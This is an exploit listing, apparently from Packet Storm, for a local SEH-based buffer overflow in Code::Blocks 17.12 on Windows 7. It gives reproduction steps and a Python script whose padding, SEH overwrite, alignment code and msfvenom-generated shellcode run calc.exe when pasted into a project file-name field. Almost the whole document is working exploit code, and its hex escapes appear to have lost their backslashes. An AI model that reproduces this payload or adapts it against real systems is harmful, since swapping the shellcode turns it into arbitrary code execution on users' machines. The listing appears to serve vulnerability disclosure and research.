Code Blocks 17.12 Local Buffer Overflow ≈ Packet Storm
# Vendor Homepage: http://www.codeblocks.org/
# Software Link Download: https://sourceforge.net/projects/codeblocks/files/Binaries/17.12/Windows/codeblocks-17.12-setup.exe/download
# Exploit Author: Paras Bhatia
# Discovery Date: 2020-06-16
# Vulnerable Software: Code Blocks
# Version: 17.12
# Vulnerability Type: Local Buffer Overflow
# Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English)
#Steps to Produce the Crash:
# 1.- Run python code: codeblocks.py
# 2.- Copy content to clipboard
# 3.- Turn off DEP for codeblocks.exe
# 4.- Open "codeblocks.exe"
# 5.- Go to "File" > "New" > "Project..."
# 6.- Click on "Files" from left box > Select "C/C++ header" > Clickon "Go" > Click on "Next"
# 7.- Paste ClipBoard into the "Filename with fullpath:" .
# 8.- Click on "Finish".
# 9.- Calc.exe runs.
#################################################################################################################################################
#Python "codeblocks.py" Code:
f= open("codeblocks.txt", "w")
junk1="A" * 2006
nseh="x61x62" #popad / align
#Found pop edi - pop ebp - ret at 0x005000E0 [codeblocks.exe] ** Unicode compatible ** ** Null byte ** [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **] - C:Program FilesCodeBlockscodeblocks.exe
seh="xe0x50"
ven = "x62" #align
ven +="x53" #push ebx
ven += "x62" #align
ven += "x58" #pop eax
ven += "x62" #align
ven += "x05x14x11" #add eax, 0x11001400
ven += "x62" #align
ven += "x2dx13x11" #sub eax, 0x11001300
ven += "x62" #align
ven += "x50" #push eax
ven += "x62" #align
ven += "xc3" #ret
junk2="x41" * 108 #required to make sure shellcode = eax
#msfvenom -p windows/exec cmd=calc.exe --platform windows -f py -e x86/unicode_mixed BufferRegister=EAX
buf = ""
buf += "x50x50x59x41x49x41x49x41x49x41x49x41x49"
buf += "x41x49x41x49x41x49x41x49x41x49x41x49x41"
buf += "x49x41x49x41x49x41x6ax58x41x51x41x44x41"
buf += "x5ax41x42x41x52x41x4cx41x59x41x49x41x51"
buf += "x41x49x41x51x41x49x41x68x41x41x41x5ax31"
buf += "x41x49x41x49x41x4ax31x31x41x49x41x49x41"
buf += "x42x41x42x41x42x51x49x31x41x49x51x49x41"
buf += "x49x51x49x31x31x31x41x49x41x4ax51x59x41"
buf += "x5ax42x41x42x41x42x41x42x41x42x6bx4dx41"
buf += "x47x42x39x75x34x4ax42x59x6cx48x68x71x72"
buf += "x69x70x4bx50x49x70x73x30x53x59x69x55x50"
buf += "x31x49x30x33x34x62x6bx62x30x50x30x74x4b"
buf += "x42x32x6ax6cx62x6bx30x52x6dx44x74x4bx52"
buf += "x52x6cx68x5ax6fx34x77x6fx5ax4ex46x50x31"
buf += "x6bx4fx74x6cx4fx4cx6fx71x31x6cx6dx32x4c"
buf += "x6cx6fx30x56x61x66x6fx6ax6dx4bx51x69x37"
buf += "x67x72x48x72x42x32x6fx67x72x6bx52x32x5a"
buf += "x70x72x6bx70x4ax4dx6cx32x6bx6ex6cx5ax71"
buf += "x64x38x7ax43x31x38x4bx51x36x71x42x31x34"
buf += "x4bx30x59x4bx70x39x71x79x43x62x6bx6dx79"
buf += "x6bx68x6ax43x6cx7ax70x49x62x6bx50x34x52"
buf += "x6bx59x71x69x46x4cx71x79x6fx34x6cx65x71"
buf += "x46x6fx4cx4dx7ax61x76x67x70x38x6bx30x30"
buf += "x75x6cx36x79x73x63x4dx49x68x6dx6bx31x6d"
buf += "x6fx34x63x45x67x74x6ex78x54x4bx72x38x6c"
buf += "x64x4bx51x77x63x71x56x74x4bx6ax6cx6ex6b"
buf += "x64x4bx32x38x4bx6cx6ax61x38x53x74x4bx6b"
buf += "x54x34x4bx4ax61x68x50x44x49x4ex64x6fx34"
buf += "x4cx64x51x4bx4fx6bx53x31x6ex79x71x4ax32"
buf += "x31x79x6fx69x50x4fx6fx4fx6fx4fx6ax64x4b"
buf += "x6ex32x58x6bx54x4dx6fx6dx30x6ax4bx51x64"
buf += "x4dx45x35x55x62x49x70x4dx30x4dx30x72x30"
buf += "x73x38x4dx61x52x6bx72x4fx54x47x79x6fx66"
buf += "x75x75x6bx68x70x35x65x45x52x6fx66x4fx78"
buf += "x73x76x56x35x75x6dx35x4dx79x6fx69x45x4d"
buf += "x6cx79x76x43x4cx6bx5ax45x30x59x6bx57x70"
buf += "x34x35x49x75x57x4bx6ex67x4ex33x32x52x52"
buf += "x4fx71x5ax49x70x51x43x6bx4fx69x45x62x43"
buf += "x43x31x52x4cx33x33x4ex4ex31x55x31x68x53"
buf += "x35x6dx30x41x41"
junk3 = "x62" * 5000 #padding to crash
payload = junk1 + nseh + seh + ven + junk2 + buf +junk3
f.write(payload)
f.close
Gloss